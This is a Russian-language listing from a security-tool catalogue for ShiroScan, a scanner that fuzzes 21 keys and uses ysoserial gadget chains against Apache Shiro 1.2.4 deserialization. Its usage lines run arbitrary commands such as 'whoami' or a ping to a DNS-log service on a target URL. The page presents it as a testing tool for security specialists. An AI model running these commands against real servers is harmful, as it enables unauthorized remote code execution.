Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ianxtianxt/shiroscan
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийФаззингТестирование на Проникновение
GitHubianxtianxt/shiroscan

ShiroScan

shiro 1.2.47 десериализация

Репозиторий
2076 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
ShiroScan — shiro 1.2.47 десериализация | Kitploit

ShiroScan

Десериализация Shiro<=1.2.4, инструмент для обнаружения в один клик

root@kitploit:~
改动内容:1.新增4个利用链模块(CommonsCollections7-10),预计增加成功率30%,已打包成新ysoserial的jar包,请勿更换
改动内容:2.增加多线程,虽模块增加但速度却提高300%
root@kitploit:~
集成21个key进行fuzz
  • Если помогло, пожалуйста, поставьте звезду. Статья в блоге: http://www.svenbeast.com/post/tskRKJIPg/

  • pip3 install -r requirments.txt

  • Использование:python3 shiro.py url command

  • Использование:python3 shiro.py https://url.com whoami

  • http://www.dnslog.cn/ для проверки рекомендуется использовать эту платформу dnslog, она намного быстрее, чем ceye.io

  • Если в выполняемой команде есть пробелы, не забудьте заключить её в кавычки ""

  • использование:python3 shiro.py http://url.com "ping dnslog.cn"

  • Прогоните все 11 модулей, затем зайдите на платформу dnslog и проверьте, был ли получен запрос. Не появился — GG, возможно, кодировок ещё недостаточно

  • Соберите кодировки самостоятельно, просто добавьте методы в исходный код в каталоге moule

  • Чтобы упростить работу скрипта, количество потоков не задаётся пользователем, по умолчанию — 20 потоков. Если нужно изменить, отредактируйте параметр, управляющий потоками, в строке 20 файла /moule/main.py

Не рекомендуется использовать в качестве exp, проблема эффективности

Только для проверки специалистами по безопасности, тест на наличие этой уязвимости

Скачать инструмент